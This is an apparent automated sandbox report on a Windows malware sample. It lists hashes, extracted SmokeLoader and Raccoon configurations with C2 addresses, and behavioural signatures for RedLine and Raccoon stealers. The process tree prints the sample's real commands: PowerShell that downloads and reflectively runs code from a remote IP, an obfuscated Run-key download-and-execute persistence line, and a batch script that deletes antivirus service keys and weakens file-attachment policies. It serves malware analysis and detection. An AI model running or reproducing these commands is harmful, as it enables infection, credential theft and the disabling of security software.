Analysis
-
max time kernel
150s -
max time network
119s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-08-2021 20:40
Static task
static1
Behavioral task
behavioral1
Sample
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
Resource
win10v20210408
General
-
Target
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
-
Size
207KB
-
MD5
4a24658b8b28d1512378d374676846dc
-
SHA1
1d326b774e7f11bcaffbdb4198db8cc47735e808
-
SHA256
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d
-
SHA512
c762af1ea682cfa41bdb211a74cce91600da32ccace258e6dd0b2ed9eb02bad2d01922ef9ccc00a6b1c909d8fe7e3955ded408a0f643da75fcfbb805de4b6d3c
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1216-147-0x0000000004970000-0x0000000004A03000-memory.dmp family_raccoon behavioral2/memory/1216-154-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/3864-159-0x0000000000400000-0x0000000002CB0000-memory.dmp family_raccoon behavioral2/memory/2168-215-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/2168-222-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1A9F.exe family_redline C:\Users\Admin\AppData\Local\Temp\1A9F.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 3160 created 1216 3160 WerFault.exe 1DBD.exe PID 792 created 3864 792 WerFault.exe 1F25.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 34 4136 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
1389.exe1520.exe1A9F.exe1DBD.exe1F25.exeRuntimebroker.exe1520.exepid process 2044 1389.exe 768 1520.exe 4028 1A9F.exe 1216 1DBD.exe 3864 1F25.exe 684 Runtimebroker.exe 2168 1520.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1A9F.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1A9F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1A9F.exe -
Deletes itself 1 IoCs
Processes:
pid process 2428 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1A9F.exe themida C:\Users\Admin\AppData\Local\Temp\1A9F.exe themida behavioral2/memory/4028-140-0x00000000008A0000-0x00000000008A1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
1A9F.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1A9F.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
1A9F.exepid process 4028 1A9F.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe1520.exedescription pid process target process PID 632 set thread context of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 768 set thread context of 2168 768 1520.exe 1520.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1820 2044 WerFault.exe 1389.exe 3820 2044 WerFault.exe 1389.exe 2736 1216 WerFault.exe 1DBD.exe 792 2044 WerFault.exe 1389.exe 1264 3864 WerFault.exe 1F25.exe 996 2044 WerFault.exe 1389.exe 2904 1216 WerFault.exe 1DBD.exe 2392 3864 WerFault.exe 1F25.exe 1920 2044 WerFault.exe 1389.exe 1944 1216 WerFault.exe 1DBD.exe 4052 3864 WerFault.exe 1F25.exe 3364 1216 WerFault.exe 1DBD.exe 1156 2044 WerFault.exe 1389.exe 3192 3864 WerFault.exe 1F25.exe 3160 1216 WerFault.exe 1DBD.exe 792 3864 WerFault.exe 1F25.exe 2284 684 WerFault.exe Runtimebroker.exe 1920 684 WerFault.exe Runtimebroker.exe 3888 684 WerFault.exe Runtimebroker.exe 1012 684 WerFault.exe Runtimebroker.exe 3820 684 WerFault.exe Runtimebroker.exe 2188 684 WerFault.exe Runtimebroker.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exepid process 3188 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe 3188 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2428 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exepid process 3188 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 2428 -
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe1A9F.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe1520.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeRestorePrivilege 1820 WerFault.exe Token: SeBackupPrivilege 1820 WerFault.exe Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeDebugPrivilege 1820 WerFault.exe Token: SeDebugPrivilege 3820 WerFault.exe Token: SeDebugPrivilege 2736 WerFault.exe Token: SeDebugPrivilege 792 WerFault.exe Token: SeDebugPrivilege 1264 WerFault.exe Token: SeDebugPrivilege 996 WerFault.exe Token: SeDebugPrivilege 2904 WerFault.exe Token: SeDebugPrivilege 2392 WerFault.exe Token: SeDebugPrivilege 1920 WerFault.exe Token: SeDebugPrivilege 1944 WerFault.exe Token: SeDebugPrivilege 4052 WerFault.exe Token: SeDebugPrivilege 1156 WerFault.exe Token: SeDebugPrivilege 3364 WerFault.exe Token: SeDebugPrivilege 3192 WerFault.exe Token: SeDebugPrivilege 3160 WerFault.exe Token: SeDebugPrivilege 4028 1A9F.exe Token: SeDebugPrivilege 792 WerFault.exe Token: SeDebugPrivilege 2284 WerFault.exe Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeDebugPrivilege 1920 WerFault.exe Token: SeDebugPrivilege 3888 WerFault.exe Token: SeDebugPrivilege 1012 WerFault.exe Token: SeDebugPrivilege 3820 WerFault.exe Token: SeDebugPrivilege 2188 WerFault.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 768 1520.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeDebugPrivilege 4364 powershell.exe Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 Token: SeShutdownPrivilege 2428 Token: SeCreatePagefilePrivilege 2428 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2428 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe1389.exeRuntimebroker.exe1520.exedescription pid process target process PID 632 wrote to memory of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 632 wrote to memory of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 632 wrote to memory of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 632 wrote to memory of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 632 wrote to memory of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 632 wrote to memory of 3188 632 d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe PID 2428 wrote to memory of 2044 2428 1389.exe PID 2428 wrote to memory of 2044 2428 1389.exe PID 2428 wrote to memory of 2044 2428 1389.exe PID 2428 wrote to memory of 768 2428 1520.exe PID 2428 wrote to memory of 768 2428 1520.exe PID 2428 wrote to memory of 768 2428 1520.exe PID 2428 wrote to memory of 4028 2428 1A9F.exe PID 2428 wrote to memory of 4028 2428 1A9F.exe PID 2428 wrote to memory of 4028 2428 1A9F.exe PID 2428 wrote to memory of 1216 2428 1DBD.exe PID 2428 wrote to memory of 1216 2428 1DBD.exe PID 2428 wrote to memory of 1216 2428 1DBD.exe PID 2428 wrote to memory of 3864 2428 1F25.exe PID 2428 wrote to memory of 3864 2428 1F25.exe PID 2428 wrote to memory of 3864 2428 1F25.exe PID 2428 wrote to memory of 3748 2428 explorer.exe PID 2428 wrote to memory of 3748 2428 explorer.exe PID 2428 wrote to memory of 3748 2428 explorer.exe PID 2428 wrote to memory of 3748 2428 explorer.exe PID 2428 wrote to memory of 2080 2428 explorer.exe PID 2428 wrote to memory of 2080 2428 explorer.exe PID 2428 wrote to memory of 2080 2428 explorer.exe PID 2428 wrote to memory of 3296 2428 explorer.exe PID 2428 wrote to memory of 3296 2428 explorer.exe PID 2428 wrote to memory of 3296 2428 explorer.exe PID 2428 wrote to memory of 3296 2428 explorer.exe PID 2044 wrote to memory of 684 2044 1389.exe Runtimebroker.exe PID 2044 wrote to memory of 684 2044 1389.exe Runtimebroker.exe PID 2044 wrote to memory of 684 2044 1389.exe Runtimebroker.exe PID 2428 wrote to memory of 3196 2428 explorer.exe PID 2428 wrote to memory of 3196 2428 explorer.exe PID 2428 wrote to memory of 3196 2428 explorer.exe PID 2428 wrote to memory of 2116 2428 explorer.exe PID 2428 wrote to memory of 2116 2428 explorer.exe PID 2428 wrote to memory of 2116 2428 explorer.exe PID 2428 wrote to memory of 2116 2428 explorer.exe PID 2428 wrote to memory of 2060 2428 explorer.exe PID 2428 wrote to memory of 2060 2428 explorer.exe PID 2428 wrote to memory of 2060 2428 explorer.exe PID 2428 wrote to memory of 1820 2428 explorer.exe PID 2428 wrote to memory of 1820 2428 explorer.exe PID 2428 wrote to memory of 1820 2428 explorer.exe PID 2428 wrote to memory of 1820 2428 explorer.exe PID 2428 wrote to memory of 1488 2428 explorer.exe PID 2428 wrote to memory of 1488 2428 explorer.exe PID 2428 wrote to memory of 1488 2428 explorer.exe PID 2428 wrote to memory of 3240 2428 explorer.exe PID 2428 wrote to memory of 3240 2428 explorer.exe PID 2428 wrote to memory of 3240 2428 explorer.exe PID 2428 wrote to memory of 3240 2428 explorer.exe PID 684 wrote to memory of 3488 684 Runtimebroker.exe powershell.exe PID 684 wrote to memory of 3488 684 Runtimebroker.exe powershell.exe PID 684 wrote to memory of 3488 684 Runtimebroker.exe powershell.exe PID 768 wrote to memory of 2168 768 1520.exe 1520.exe PID 768 wrote to memory of 2168 768 1520.exe 1520.exe PID 768 wrote to memory of 2168 768 1520.exe 1520.exe PID 768 wrote to memory of 2168 768 1520.exe 1520.exe PID 768 wrote to memory of 2168 768 1520.exe 1520.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1389.exeC:\Users\Admin\AppData\Local\Temp\1389.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7082⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 8922⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 9162⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 9282⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 7363⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 7883⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 7603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 8003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 10083⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 10363⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 